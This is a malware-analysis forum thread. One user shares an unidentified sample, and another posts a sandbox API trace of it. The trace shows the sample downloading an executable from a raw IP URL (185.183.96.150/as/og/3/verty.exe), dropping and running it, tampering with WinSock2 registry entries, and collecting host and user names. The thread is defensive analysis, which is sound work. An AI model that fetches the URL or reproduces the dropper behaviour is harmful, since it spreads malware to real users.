A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #29696  by xors
 Fri Dec 09, 2016 5:57 pm
Malware. Not sure which one
Attachments
password:infected
(240.08 KiB) Downloaded 109 times
 #29827  by maddog4012
 Wed Jan 04, 2017 9:39 pm
calls out ot http://185.183.96.150/as/og/3/verty.exe

Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, cryptbase.dll, 75030000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 52eb24, 0, %windir%\system32\uxtheme.dll, 73f40000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 52eb24, 0, %windir%\system32\uxtheme.dll, 73f40000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 52eb24, 0, %windir%\system32\uxtheme.dll, 73f40000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 52eb24, 0, %windir%\system32\uxtheme.dll, 73f40000 ) Return: 0 2816
Call Window API API Name: CreateWindowExW Args: ( 0, c03b, OleMainThreadWndName, 88000000, 80000000, 80000000, 80000000, 80000000, fffffffd, 0, 758d0000, 0 ) Return: 4017e 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, api-ms-win-security-lsalookup-l1-1-0.dll, 75bd0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, advapi32.dll, 76be0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, kernel32.dll, 76b00000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, sxs.dll, 75040000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, dwmapi.dll, 73c10000 ) Return: 0 2816
Call Window API API Name: CreateWindowExA Args: ( 0, 1b2e6c, , 0, 0, 0, 1, 1, 0, 0, 1b0000, ff750 ) Return: 201e0 2816
API Name: CLSIDFromString Args: ( JScript ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, clbcatq.dll, 75480000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, advapi32.dll, 76be0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\jscript.dll, 69df0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ole32.dll, 758d0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\advapi32.dll, 76be0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, wintrust.dll, 75180000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, cryptsp.dll, 74b90000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\rsaenh.dll, 74930000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, advapi32.dll, 76be0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, cryptbase.dll, 75030000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, msisip.dll, 6b6c0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ole32.dll, 758d0000 ) Return: 0 2816
Call Filesystem API API Name: NtReadFile Args: ( 1e4, , , , , , 200, , ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 1002, %windir%\system32\crypt32.dll, 75200000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, imm32.dll, 76ae0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\wshext.dll, 69dd0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 56d58c, 0, %windir%\system32\scrobj.dll, 69da0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, cryptsp.dll, 74b90000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, rpcrtremote.dll, 750d0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 585b6c, 0, %windir%\system32\wshom.ocx, 69d70000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 585c6c, 0, %windir%\system32\scrrun.dll, 69d40000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, advapi32.dll, 76be0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 58ad24, 0, %windir%\system32\winhttp.dll, 70490000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, oleaut32.dll, 756a0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, shlwapi.dll, 77120000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, advapi32.dll, 76be0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, winhttp.dll, 70490000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ws2_32.dll, 77090000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ws2_32.dll, 77090000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, kernel32.dll, 76b00000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, sspicli.dll, 75010000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, cryptsp.dll, 74b90000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, credssp.dll, 74830000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, rpcrt4.dll, 75520000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, advapi32.dll, 76be0000 ) Return: 0 2816
Call Internet Helper API API Name: WinHttpOpen Args: ( Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), 0, , , 0 ) Return: 58aef0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, secur32.dll, 74ff0000 ) Return: 0 2816
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, Enzo-Win7\Administrator, 32d6d4 ) Return: 1 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, shell32.dll, 75bf0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ole32.dll, 758d0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, advapi32.dll, 76be0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, api-ms-win-security-sddl-l1-1-0.dll, 75bd0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, profapi.dll, 750e0000 ) Return: 0 2816
Call Filesystem API API Name: CreateDirectoryW Args: ( C:\Users\Administrator, 0 ) Return: 0 2816
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local, 0 ) Return: 0 2816
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files, 0 ) Return: 0 2816
Call Filesystem API API Name: CreateDirectoryW Args: ( C:\Users\Administrator, 0 ) Return: 0 2816
Call Filesystem API API Name: CreateDirectoryW Args: ( %APPDATA%, 0 ) Return: 0 2816
Call Filesystem API API Name: CreateDirectoryW Args: ( %APPDATA%\Microsoft\Windows\Cookies, 0 ) Return: 0 2816
Call Filesystem API API Name: CreateDirectoryW Args: ( C:\Users\Administrator, 0 ) Return: 0 2816
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local, 0 ) Return: 0 2816
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local\Microsoft\Windows\History, 0 ) Return: 0 2816
Call Filesystem API API Name: SetFileAttributesW Args: ( %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_NOT_CONTENT_INDEXED ) Return: 1 2816
Call Filesystem API API Name: SetFileTime Args: ( 264, NULL, NULL, 2017-00-4/20:51:47 ) Return: 1 2816
Call Filesystem API API Name: SetFileAttributesW Args: ( %APPDATA%\Microsoft\Windows\Cookies\, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_NOT_CONTENT_INDEXED ) Return: 1 2816
Call Filesystem API API Name: SetFileTime Args: ( 27c, NULL, NULL, 2017-00-4/20:51:47 ) Return: 1 2816
Call Filesystem API API Name: SetFileTime Args: ( 288, NULL, NULL, 2017-00-4/20:51:47 ) Return: 1 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, comctl32.dll, 740c0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ws2_32.dll, 77090000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, dnsapi, 74a10000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ole32.dll, 758d0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, iphlpapi, 73370000 ) Return: 0 2816
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, Enzo-Win7\Administrator, 32d4a0 ) Return: 1 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\netprofm.dll, 6fb50000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ole32.dll, 758d0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\npmproxy.dll, 73a20000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, oleaut32.dll, 756a0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 5a7284, 0, %windir%\system32\oleaut32.dll, 756a0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, oleaut32.dll, 756a0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\nlaapi.dll, 73540000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\napinsp.dll, 73900000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, api-ms-win-security-sddl-l1-1-0.dll, 75bd0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\pnrpnsp.dll, 737d0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\pnrpnsp.dll, 737d0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\mswsock.dll, 74b50000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, dnsapi.dll, 74a10000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\winrnr.dll, 737c0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ws2_32.dll, 77090000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\fwpuclnt.dll, 73220000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, rasadhlp.dll, 70560000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\mswsock.dll, 74b50000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, wshtcpip, 746c0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, wship6.dll, 74b40000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\wshqos.dll, 70600000 ) Return: 0 2816
Call Internet Helper API API Name: WinHttpConnect Args: ( 58aef0, 185.183.96.150, 80, 0 ) Return: 59d3c0 2816
Call Internet Helper API API Name: WinHttpOpenRequest Args: ( 59d3c0, get, /as/og/3/verty.exe, HTTP/1.1, , , 128 ) Return: 5b4a40 2816
Detection
Threat characteristic: Connects to remote URL or IP address
http://185.183.96.150/as/og/3/verty.exe

Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, dnsapi.dll, 74a10000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, rpcrt4.dll, 75520000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, %windir%\system32\wshtcpip.dll, 746c0000 ) Return: 0 2816
Call Network API API Name: socket Args: ( 2, 1, 6 ) Return: 380 2816
Call Network API API Name: bind Args: ( 380, 0.0.0.0:49174, 128 ) Return: 0 2816
Detection
Threat characteristic: Listens on port
0.0.0.0:49174

Call Network API API Name: send Args: ( 380, GET /as/og/3/verty.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 [compatible; MSIE 7.0; Windows NT 5.1]\r\nHost: 185.183.96.150\r\n\r\n, 1, 158 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, ole32.dll, 758d0000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 4dfe6c, 0, msdart.dll, 69c20000 ) Return: 0 2816
Call System API API Name: LdrLoadDll Args: ( 5bce8c, 0, %CommonProgramFiles%\system\ado\msado15.dll, 69c40000 ) Return: 0 2816
Add File Path: %USERPROFILE%\radAD8EF.tmp.exe Type: VSDT_EXE_W32 2816
Detection
Threat characteristic: Uses double extension with executable tail
%USERPROFILE%\radAD8EF.tmp.exe

Detection
Threat characteristic: Drops executable during installation
Dropping Process ID: 2816
File: %USERPROFILE%\radAD8EF.tmp.exe
Type: VSDT_EXE_W32

Write File Path: %USERPROFILE%\radAD8EF.tmp.exe Type: VSDT_EXE_W32 2816
Detection
Threat characteristic: Modifies file that can be used to infect systems
%USERPROFILE%\radAD8EF.tmp.exe

Call Thread API API Name: NtGetContextThread Args: ( 916, 32d660 ) Return: 0 2816
Call Process API API Name: CreateProcessW Args: ( , %USERPROFILE%\radAD8EF.tmp.exe, , , , , , , , Process:2908:radAD8EF.tmp.exe ) Return: 1 2816
Detection
Threat characteristic: Executes dropped file
File: %USERPROFILE%\radAD8EF.tmp.exe
Command: %USERPROFILE%\radAD8EF.tmp.exe

Call Window API API Name: DestroyWindow Args: ( 4017e ) Return: 1 2816
Detection
Threat characteristic: Creates process
Process ID: 2908
Image Path: %USERPROFILE%\radAD8EF.tmp.exe

Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\00000023\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004\ Value: None 2816 2908
Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, kernel32, 76b00000 ) Return: 0 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015\ Value: None 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016\ Value: None 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001\ProtocolName Value: @%SystemRoot%\System32\wshtcpip.dll,-60100 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002\ProtocolName Value: @%SystemRoot%\System32\wshtcpip.dll,-60101 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003\ProtocolName Value: @%SystemRoot%\System32\wshtcpip.dll,-60102 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004\ProtocolName Value: @%SystemRoot%\System32\wship6.dll,-60100 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005\ProtocolName Value: @%SystemRoot%\System32\wship6.dll,-60101 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006\ProtocolName Value: @%SystemRoot%\System32\wship6.dll,-60102 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007\ProtocolName Value: @%SystemRoot%\System32\wshqos.dll,-100 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008\ProtocolName Value: @%SystemRoot%\System32\wshqos.dll,-101 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009\ProtocolName Value: @%SystemRoot%\System32\wshqos.dll,-102 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010\ProtocolName Value: @%SystemRoot%\System32\wshqos.dll,-103 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011\PackedCatalogItem Value: None 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012\PackedCatalogItem Value: None 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013\PackedCatalogItem Value: None 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014\PackedCatalogItem Value: None 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015\PackedCatalogItem Value: None 2816 2908
Add Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016\ Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016\PackedCatalogItem Value: None 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Num_Catalog_Entries Value: 10 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Next_Catalog_Entry_ID Value: 457 2816 2908
Write Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\Serial_Access_Num Value: 24 2816 2908
Delete Registry Key Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9\00000023\ Value: None 2816 2908
Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, sspicli.dll, 75010000 ) Return: 0 2816 2908
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, , 12c778 ) Return: 0 2816 2908
Call Systeminfo API API Name: GetComputerNameW Args: ( Enzo-Win7, 12c778 ) Return: 1 2816 2908
Call System API API Name: LdrLoadDll Args: ( 184164, 0, %windir%\system32\uxtheme.dll, 73f40000 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 184164, 0, %windir%\system32\uxtheme.dll, 73f40000 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 184164, 0, %windir%\system32\uxtheme.dll, 73f40000 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 184164, 0, %windir%\system32\uxtheme.dll, 73f40000 ) Return: 0 2816 2908
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, , 12c794 ) Return: 0 2816 2908
Call Systeminfo API API Name: GetComputerNameW Args: ( Enzo-Win7, 12c794 ) Return: 1 2816 2908
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, , 12c7a0 ) Return: 0 2816 2908
Call Systeminfo API API Name: GetComputerNameW Args: ( Enzo-Win7, 12c7a0 ) Return: 1 2816 2908
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, , 12c768 ) Return: 0 2816 2908
Call Systeminfo API API Name: GetComputerNameW Args: ( Enzo-Win7, 12c768 ) Return: 1 2816 2908
Call Window API API Name: CreateWindowExW Args: ( 0, 71c29a8c, , 50800000, 0, 0, 64, 1e, 0, ffffffff, 71c20000, 0 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, ntdll.dll, 76f50000 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, shlwapi.dll, 77120000 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, setupapi.dll, 75a30000 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, kernel32.dll, 76b00000 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, user32.dll, 76840000 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, advapi32.dll, 76be0000 ) Return: 0 2816 2908
Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, shell32.dll, 75bf0000 ) Return: 0 2816 2908
